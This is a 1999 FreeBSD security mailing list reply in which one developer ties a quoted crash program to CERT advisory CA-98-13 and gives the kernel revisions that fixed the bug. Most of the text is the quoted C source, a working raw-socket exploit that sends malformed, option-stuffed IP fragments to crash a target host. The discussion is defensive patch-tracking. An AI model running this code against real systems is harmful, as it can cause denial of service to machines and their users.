Date: Mon, 10 May 1999 20:18:03 -0700 From: Don Lewis <Don.Lewis@tsc.tdk.com> To: Darren Reed <avalon@coombs.anu.edu.au>, freebsd-security@FreeBSD.ORG Subject: Re: freebsd mbuf crash Message-ID: <199905110318.UAA26058@salsa.gv.tsc.tdk.com> In-Reply-To: Darren Reed <avalon@coombs.anu.edu.au> "freebsd mbuf crash" (May 5, 1:26am)
I now suspect this is an exploit for the bug mentioned in CERT Advisory CA-98-13-tcp-denial-of-service. If so, this bug was fixed for FreeBSD 3.0-CURRENT in revision 1.105 of ip_input.c, and in revision 1.50.2.22 before 2.2.8-RELEASE. Both fixes were committed on November 11, 1998. This exploit's use of a large number of options in the IP header seems to be the tipoff. On May 5, 1:26am, Darren Reed wrote: } Subject: freebsd mbuf crash } } is this one (below) taken care of ? perhaps a derivative of this ? } } darren } } /* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998. } * I'm only releasing this as an example because the bug hardly ever reliably crashes a machine. } */ } } #include <stdio.h> } #include <stdlib.h> } #include <netinet/ip.h> } #define __FAVOR_BSD } #include <netinet/tcp.h> } #include <netinet/in.h> } #include <sys/socket.h> } #include <arpa/inet.h> } #include <netdb.h> } #include <strings.h> } } } u_long htona(char *host) } { } u_long addr; } struct hostent *hp; } } if ((addr=inet_addr(host)) == INADDR_NONE) { } if ((hp = gethostbyname(host)) == NULL) } return(-1); } bcopy(hp->h_addr_list[0], &addr, sizeof(addr)); } } } return(addr); } } } } int main(int argc, char* argv[]) } { } char buf[128]; } struct ip *iph = (struct ip *)buf; } u_char *ipoptions = (u_char *)(buf + sizeof(struct ip)); } struct tcphdr *tcph = (struct tcphdr *)(buf + 60); } int s, i; } struct sockaddr_in sin; } } if (argc != 2) { } printf("usage\n\t%s <host>\n", argv[0]); } exit(1); } } } s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); } if (s < 0) { } perror("socket"); } exit(1); } } } sin.sin_family = AF_INET; } sin.sin_port = htons(7); } sin.sin_addr.s_addr = htona(argv[1]); } if (sin.sin_addr.s_addr == -1) { } printf("Error resolving %s\n", argv[1]); } exit(1); } } } } bzero(buf, sizeof(buf)); } iph->ip_hl=15; } iph->ip_v=4; } iph->ip_len=htons(124); } iph->ip_id= htons(getpid()); } iph->ip_off= htons(IP_MF); } iph->ip_ttl = 255; } iph->ip_p = IPPROTO_TCP; } 
bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long)); } iph->ip_src.s_addr = htona("10.2.3.4"); } for (i = 0; i < 20;i++) { } ipoptions[i]=0xff; } } } ipoptions[0] = 0xff; /* Made up option */ } ipoptions[1] = 0x1a; } memset((char *)&ipoptions[2], 0xff, 37); } ipoptions[39] = 1; /* IP_NOP */ } tcph->th_sport = htons(5505); } tcph->th_dport = htons(23); } tcph->th_seq = htonl(0xabcde123); } tcph->th_ack = htonl(0x321edcba); } tcph->th_flags = TH_ACK | TH_PUSH; } tcph->th_win = htons(0x1234); } } if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { } perror("sendto"); } exit(1); } } } if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) { } perror("sendto"); } exit(1); } } } iph->ip_len = htons(80); } iph->ip_off = htons(8); } if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) { } perror("sendto"); } exit(1); } } } exit(0); } } } } } } To Unsubscribe: send mail to majordomo@FreeBSD.org } with "unsubscribe freebsd-security" in the body of the message }-- End of excerpt from Darren Reed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message